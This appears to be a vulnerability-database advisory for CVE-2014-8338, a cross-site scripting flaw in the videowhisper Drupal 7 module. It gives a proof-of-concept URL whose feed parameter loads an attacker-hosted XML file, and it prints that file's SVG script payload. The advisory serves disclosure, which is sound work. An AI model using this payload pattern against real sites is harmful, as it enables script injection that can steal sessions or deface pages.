logo
DATABASE RESOURCES PRICING ABOUT US

[CVE-2014-8338] Cross Site Scripting (XSS) vulnerability in videowhisper

Description

Hello, Cross Site Scripting (XSS) vulnerability exists in videowhisper module for Drupal 7. Vendor Notification: 22, Oct 2014 Vulnerable file: drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php POC: http://vulnerable-website/drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php?feed=http://attacker-website/xss.txt The content of xss.txt: <root> <script xmlns="http://www.w3.org/2000/svg"><![CDATA[ alert('XSS'); ]]></script> </root> Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers. Best regards